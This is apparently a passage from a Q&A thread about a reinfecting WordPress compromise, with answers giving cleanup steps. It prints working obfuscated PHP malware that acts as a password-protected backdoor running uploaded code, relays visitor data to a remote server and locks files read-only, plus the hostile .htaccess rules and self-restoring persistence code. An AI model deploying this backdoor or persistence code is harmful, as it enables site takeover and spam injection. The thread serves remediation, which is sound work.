$OOO0__0O_0;');$O_O0O_00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$O__OO00_0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x4f\x4f\x30\x5f\x30"]($O0_O00_OO_);$OO0_0__0OO=\'\';for ($O_00OO0O__=0;$O_00OO0O__<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__OO00_0O);$O_00OO0O__++){if($O_00OO0O__%2!=0){$OO0_0__0OO.=$O__OO00_0O[$O_00OO0O__];}}return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO0_0__0OO);');$O__O0_00OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_OO00__0O','$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x5f\x4f\x4f\x30\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O));$O__00O_0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x30\x4f\x5f\x5f"](\'/\\|/si\',$O_OO00__0O,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O__00O_0OO)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__00O_0OO)<2){return false;}$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30\x5f"]($O__00O_0OO);$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O_array["data"]);$O_OO00__0O_array["headers"]=$O__00O_0OO;return 
$O_OO00__0O_array;');$O_OO0_O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_0_0_OO0O=\'\'','if($O_0_0_OO0O==\'\'){$O_0_0_OO0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'08soShTUxOTi0tPuBgA=\');}$O_OO00__0O="PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilyYWRpb1wucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWNvbnRlbnRcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilhYm91dFwucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWxvY2szNjBcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKikucGhwKC4qKSQgL2luZGV4LnBocCBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==";$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($O_0_0_OO0O)){$O_OO_O00_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x30\x30\x30\x5f\x4f"]($O_0_0_OO0O);if($O_OO00__0O==$O_OO_O00_0){return;}}$OO_0__O0O0="robots.txt";if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($OO_0__O0O0)){@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($OO_0__O0O0,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($OO_0__O0O0);}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($O_0_0_OO0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"]($O_0_0_OO0O,$O_OO00__0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0444);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x30\x4f"]($O_0_0_OO0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x30\x5f\
x5f\x5f"]("-400 days",${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x30\x4f\x30\x5f\x5f"]()));');$O__00_OOO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]=$O0_O00_OO_;$params["\x61\x70\x69"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x5f\x30\x30\x4f\x5f"]($params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]);$params["server_domain"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x4f\x5f\x4f\x30\x30"]();$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$params["\x72\x65\x66\x65\x72\x65\x72"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:\'\';$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:\'\';$params["\x69\x70"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x30\x5f\x30\x5f\x4f"]();if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"])){$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="https://";}else{$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="http://";}if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"])){$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"];}else{$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]="";}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x72\x61\x6d\x73"])){header("Content-type:application/json");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]("json_encode")){echo 
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x30\x5f\x4f\x4f"]($params);}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x30\x4f\x5f\x30\x4f"]($params);}die();}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"])&&${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f"](${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"]."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$OO0_0OO0__=sprintf("https://www.google.com/ping?sitemap=%s%s/%s",$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"]);$O_0_O0OO0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($OO0_0OO0__);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x5f\x4f\x4f\x30"]($O_0_O0OO0_,"google")!=false){die("success");}else{die("failed");}}if(isset(${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"])){$OO0_0_0O_O =${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x4f\x5f\x30\x30\x30"](${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"]));$OO0_0_0O_O=\' 
\'.$OO0_0_0O_O.\'\';@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"](\'407.php\',$OO0_0_0O_O);require_once(\'407.php\');@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"](\'407.php\');die();}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x4f\x30\x30\x5f"]();$O_OO00_0_O=array(\'domain\'=>$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],\'request_url\'=>$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],\'ip\'=>$params["\x69\x70"],\'agent\'=>$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],\'referer\'=>$params["\x72\x65\x66\x65\x72\x65\x72"],\'protocol\'=>$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],\'language\'=>$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($params["\x61\x70\x69"],0,2,$O_OO00_0_O,array(),$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]);$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x30\x30\x4f\x4f"]($O_OO00__0O);if($O_O_0O00_O!==false){foreach($O_O_0O00_O["headers"] as $header){@header($header);}echo $O_O_0O00_O["data"];die();}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x4f\x30"]($O0_O00_OO_);?>

Außerdem ändert es ständig meine .htaccess-Dateien wie folgt:

# Rewrite block that the infection keeps writing back. The first RewriteRule and
# the final RewriteCond/RewriteRule group match the stock WordPress block; the
# five rules in between are additions.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# Requests for index.php itself are passed through unchanged.
RewriteRule ^index\.php$ - [L]
# Pass-through exceptions: any path ending in one of these four file names is
# served as-is. NOTE(review): presumably further files used by the infection;
# check for files with these names in unexpected locations.
RewriteRule ^(.*)radio\.php$ - [L]
RewriteRule ^(.*)content\.php$ - [L]
RewriteRule ^(.*)about\.php$ - [L]
RewriteRule ^(.*)lock360\.php$ - [L]
# Every other path containing "php" preceded by any character (the dot is
# unescaped) is rewritten to /index.php. That covers wp-login.php and the
# wp-admin scripts, so they are answered by the replaced index.php instead;
# likely the reason WP Admin is unreachable.
RewriteRule ^(.*).php(.*)$ /index.php [L]
# The two conditions apply only to the rule directly below them: paths that are
# neither an existing file nor an existing directory go to /index.php.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Selbst wenn ich diese Dateien lösche oder ihre Berechtigungen ändere, erstellt WordPress sie erneut mit der Berechtigung 0444.

Einige der infizierten Dateien hießen n3.php und befanden sich in einigen Plugin-Ordnern, z. B. in dem von Contact Form 7.

Kann mir bitte jemand dabei helfen? Danke im Voraus

  • Der vollständige Code befindet sich auf meinem Google Drive: [docs.google.com/document/d/…

    – bambus

    Nov 4, 2020 at 3:50


  • I have same problem. But when I delete all files and directories under web root the modified .htaccess and index.php files are created again. It still happens after FTP password change.

    – Bartłomiej Jakub Kwiatek

    Dec 9, 2020 at 11:59

I had the same issue as you described, and what I did to fix it is the following, using the cPanel file manager:

  • Edit or Replace .htaccess without the malicious code.

  • Delete all wordpress system files with the exception of wp-config.php and the wp-content folder.

  • Go to https://wordpress.org/download/releases/ and download the version of wordpress that you require in zip format.

  • Upload the wordpress .zip file inside the main directory of your online wordpress folder and then extract it using the file manager extract option, this will create a ‘wordpress’ folder, go inside this folder and copy all the system files/folders except for the wp-content folder, make sure you copy it into the correct destination.

  • Download latest version of all your plugins from original sources to your local computer (most of them will be in .zip format)

  • Delete the whole wp-content/plugins folder and then manually upload each individual plugin back into the wp-content/plugins folder. (If you upload the plugins in zip file format, you will need to extract the zip file after uploading using the file manager's extract option, and then delete the original zip file after extraction.)

  • If you are using a cache plugin, I suggest locating the cache folder as sometimes it is located elsewhere (not inside wp-content folder) and then manually deleting all the accumulated cache files, if you’re not familiar where it is located then do the research.

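  • After doing all this, you’ll end up with a clean install of WordPress and all your plugins; there should be no remnant of the malicious code anymore, and it should not return. Note that these steps keep wp-config.php and the rest of wp-content (for example themes and uploads) as they were, so inspect those as well before treating the site as clean.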

I hope this helps, good luck!

  • Also remove all cron job entries, or better, delete the hosting account and create a new one. Also check the database for admin users and delete suspicious ones.

    – Nabi K.A.Z.

    Feb 15 at 17:02


Code inside index.php regenerates itself. When you delete index.php, code previously in that file still gets executed (it’s still loaded in memory). Solution: restart PHP process to unload from memory.

  • makes sense, all that came to my mind was a cronjob

    – Yehia A.Salam

    Jul 7, 2021 at 13:20

  • any one able to find out what caused this malware to hook up in the first place?

    – M.Imran Mamda

    Feb 21 at 18:49

I had the same issue with a WordPress installation that had not been updated.
My quick solution is to run two commands over SSH from the www root folder:

# Stopgap only: both commands edit files in place (sed -i, no backup copy) and
# comment code out rather than removing it, so the infected files and the hidden
# copies they point to remain on disk and still have to be cleaned up.
#
# Command 1: in every *.php file below the current directory, put "//" in front
# of each occurrence of: $path = "/home
find . -type f -name '*.php' -print0 | xargs -0 sed -i 's/$path = "\/home/\/\/$path = "\/home/g'
# Command 2: in every file named index.php, put "//" in front of each
# occurrence of $OO0, which turns the rest of that line into a comment.
find . -type f -name 'index.php' -print0 | xargs -0 sed -i 's/$OO0/\/\/$OO0/g'

where /home – must be replaced with your site www folder, most times it is /var/www

Command 1 comments out the line that holds the location of the virus code file.

Command 2 comments out the line containing the virus in index.php.

My virus regeneration code was located in
/domains/public_html/wp-includes/plugin.php

Virus regeneration code in plugin.php:

// Persistence snippet as found by the poster: three near-identical stanzas that
// differ only in the $path of the hidden copy (and in one variable name).
// Each stanza rewrites index.php from an encoded copy stored elsewhere on disk,
// so cleaning index.php alone does not hold. Removal needs this code gone AND
// every file named in a $path deleted.

// Stanza 1: hidden copy is an extensionless, numerically named file inside a
// plugin directory.
$index_path = "index.php";
// Relative path, so it resolves against the working directory of the request.
// If index.php was deleted this read fails and the hash comparison below no
// longer matches, which leads to the file being written back.
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-content/plugins/advanced-custom-fields/core/actions/173692";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
// Decoding order, innermost call first: rot13, base64, rot13, base64.
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
// Compare the current index.php with the decoded copy by MD5 hash.
if(md5($index) != md5($index_hide))
{
    // Make the file writable, overwrite it with the decoded copy, then set it
    // to read-only (0444). The @ prefix suppresses any error output.
    @chmod($index_path, 0644);
    @file_put_contents($index_path, $index_hide);
    @chmod($index_path, 0444);
}
}

// Stanza 2: same logic; hidden copy sits under wp-admin/css/colors/blue.
$i_p = "index.php";
$index = file_get_contents($i_p);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/blue/100158";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
    @chmod($i_p, 0644);
    @file_put_contents($i_p, $index_hide);
    @chmod($i_p, 0444);
}
}

// Stanza 3: same logic; hidden copy sits under wp-admin/css/colors/coffee.
$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/coffee/139039";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
    @chmod($index_path, 0644);
    @file_put_contents($index_path, $index_hide);
    @chmod($index_path, 0444);
}
}
